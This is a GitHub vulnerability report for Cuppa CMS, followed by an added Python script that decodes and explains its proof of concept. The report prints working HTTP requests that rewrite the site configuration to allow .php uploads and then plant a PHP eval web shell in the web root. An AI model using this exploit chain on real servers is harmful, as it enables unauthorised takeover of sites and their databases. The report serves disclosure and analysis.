Unauthorized Remote Code Execution vulnerability exists in Cuppa cms via file upload function #26

Open
bkfish opened this issue Feb 19, 2022 · 0 comments

Comments

@bkfish
Copy link

bkfish commented Feb 19, 2022

A non-authenticated attacker can upload an arbitrary file via /js/jquery_file_upload/server/php/index.php and execute it on the server, achieving RCE.

PoC:

POST /classes/ajax/Functions.php HTTP/1.1
Host: localhost:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1061
Cookie:  country=us; language=en; administrator_document_path=%2F

file=eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IiJ9&function=saveConfigData

This request sets $allowed_extensions in Configuration.php, adding .php.

Then upload a PHP file, setting the path to "../":

POST /js/jquery_file_upload/server/php/ HTTP/1.1
Host: localhost:8888
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------8021712423960420462477355542
Content-Length: 930

-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="path"

../
-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="unique_name"

true
-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="resize_width"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="resize_height"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="crop"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="compress"


-----------------------------8021712423960420462477355542
Content-Disposition: form-data; name="files[]"; filename="cmd.php"
Content-Type: image/jpeg


<?php @eval($_POST['cmd']);?>
-----------------------------8021712423960420462477355542--


The uploaded file name can be seen in the response: "url":"..\/..\/..\/..\/media\/..\/\/cmd_1645281565.php"
As we can see, /media/../cmd_1645281565.php is the same as /cmd_1645281565.php,
so visiting /cmd_1645281565.php you can get a shell.

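The following is an added example, not code from the issue author and not part of Cuppa CMS. It decodes the base64 "file" blob from the first PoC request to show exactly what saveConfigData is being asked to write (the allowed_extensions value now ends in *.php, and the same payload also carries database credentials and the global encode salt), re-implements the kind of "*.gif; *.jpg; ..." glob allow-list check such a setting implies (the CMS's real matching code is not shown on the page, so that function is an assumption), and normalises the escaped "url" from the upload response relative to the handler directory to show that media/../ collapses onto the web root. DEFAULT_ALLOWED is assumed to be the PoC value with *.php removed; all helper names are mine.

```python
"""Added example (not the issue author's code and not part of Cuppa CMS):
decode the saveConfigData payload from the PoC, check which filenames the
rewritten allowed_extensions would admit, and resolve the upload response URL."""
import base64
import fnmatch
import json
import posixpath
from urllib.parse import parse_qs

# Form body of the first PoC request, copied from the issue above.
POC_CONFIG_BODY = (
    "file=eyJhZG1pbmlzdHJhdG9yX3RlbXBsYXRlIjoiZGVmYXVsdCIsImxpc3RfbGltaXQiOiIyNSIsImZvbnRfbGlzdCI6IlJhbGV3YXkiLCJzZWN1cmVfbG9naW4iOiIwIiwic2VjdXJlX2xvZ2luX3ZhbHVlIjoiIiwic2VjdXJlX2xvZ2luX3JlZGlyZWN0IjoiIiwibGFuZ3VhZ2VfZGVmYXVsdCI6ImVuIiwiY291bnRyeV9kZWZhdWx0IjoidXMiLCJnbG9iYWxfZW5jb2RlIjoic2hhMVNhbHQiLCJnbG9iYWxfZW5jb2RlX3NhbHQiOiJBR2R2TWRxOVJSY3dqRnowWFFxdWNwRnByS1hnYldNMiIsInNzbCI6IjAiLCJsYXRlcmFsX21lbnUiOiJleHBhbmRlZCIsImJhc2VfdXJsIjoiIiwiYXV0b19sb2dvdXRfdGltZSI6IjMwIiwicmVkaXJlY3RfdG8iOiJmYWxzZSIsImhvc3QiOiJsb2NhbGhvc3QiLCJkYiI6ImJhaWNtcyIsInVzZXIiOiJyb290IiwicGFzc3dvcmQiOiIxMjNxd2UiLCJ0YWJsZV9wcmVmaXgiOiJjdV8iLCJhbGxvd2VkX2V4dGVuc2lvbnMiOiIqLmdpZjsgKi5qcGc7ICouanBlZzsgKi5wZGY7ICouaWNvOyAqLnBuZzsgKi5zdmc7Ki5waHA7IiwidXBsb2FkX2RlZmF1bHRfcGF0aCI6InVwbG9hZF9maWxlcyIsIm1heGltdW1fZmlsZV9zaXplIjoiNTI0Mjg4MCIsImNzdl9jb2x1bW5fc2VwYXJhdG9yIjoiLCIsInRpbmlmeV9rZXkiOiIiLCJlbWFpbF9vdXRnb2luZyI6IiIsImZvcndhcmQiOiIiLCJzbXRwIjoiMCIsImVtYWlsX2hvc3QiOiIiLCJlbWFpbF9wb3J0IjoiIiwiZW1haWxfcGFzc3dvcmQiOiIiLCJzbXRwX3NlY3VyaXR5IjoiIiwiY29kZSI6IiJ9"
    "&function=saveConfigData"
)

# "url" value from the upload response quoted in the issue (JSON-escaped slashes kept as-is).
POC_UPLOAD_URL = r"..\/..\/..\/..\/media\/..\/\/cmd_1645281565.php"

# Directory of the upload handler the response URL is relative to (second PoC request).
UPLOAD_HANDLER_DIR = "/js/jquery_file_upload/server/php/"

# Assumed pre-attack allow-list: the PoC value with the appended *.php removed.
DEFAULT_ALLOWED = "*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;"


def decode_config_payload(body: str) -> tuple[str, dict]:
    """Return (function name, decoded config dict) from the x-www-form-urlencoded body."""
    params = parse_qs(body, keep_blank_values=True)
    func = params["function"][0]
    b64 = params["file"][0]
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped base64 padding
    config = json.loads(base64.b64decode(b64, validate=True))
    return func, config


def extension_allowed(allowed_extensions: str, filename: str) -> bool:
    """Hypothetical re-implementation of a '*.gif; *.jpg; ...' allow-list check
    (Cuppa's real matching code is not shown on the page): split on ';',
    trim, case-insensitive glob match against the bare file name."""
    patterns = [p.strip() for p in allowed_extensions.split(";") if p.strip()]
    name = posixpath.basename(filename).lower()
    return any(fnmatch.fnmatchcase(name, p.lower()) for p in patterns)


def resolve_upload_url(escaped_url: str, handler_dir: str = UPLOAD_HANDLER_DIR) -> str:
    """Unescape the JSON '\\/' sequences and normalise the path relative to the
    upload handler directory; media/../ collapses so the file lands in the web root."""
    rel = escaped_url.replace("\\/", "/")
    return posixpath.normpath(posixpath.join(handler_dir, rel))


def sensitive_keys(config: dict) -> list[str]:
    """Keys in the decoded payload that an unauthenticated caller should never be
    able to set; listed so the blast radius of saveConfigData is visible."""
    watch = ("host", "db", "user", "password", "global_encode_salt",
             "allowed_extensions", "upload_default_path")
    return [k for k in watch if k in config]


if __name__ == "__main__":
    func, cfg = decode_config_payload(POC_CONFIG_BODY)
    print("function:", func)
    for k in sensitive_keys(cfg):
        print(f"  {k} = {cfg[k]!r}")
    for allow in (DEFAULT_ALLOWED, cfg["allowed_extensions"]):
        print("cmd.php allowed under", repr(allow), "->", extension_allowed(allow, "cmd.php"))
    print("upload resolves to:", resolve_upload_url(POC_UPLOAD_URL))
```

Run as a script it prints the decoded fields, shows cmd.php rejected under the assumed default list and accepted once *.php is appended, and resolves the returned URL to /cmd_1645281565.php. The decode step is what an analyst wants when triaging a captured request: the base64 is not obfuscation of the file contents but the entire site configuration, so the same unauthenticated endpoint also rewrites the database host, user and password.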
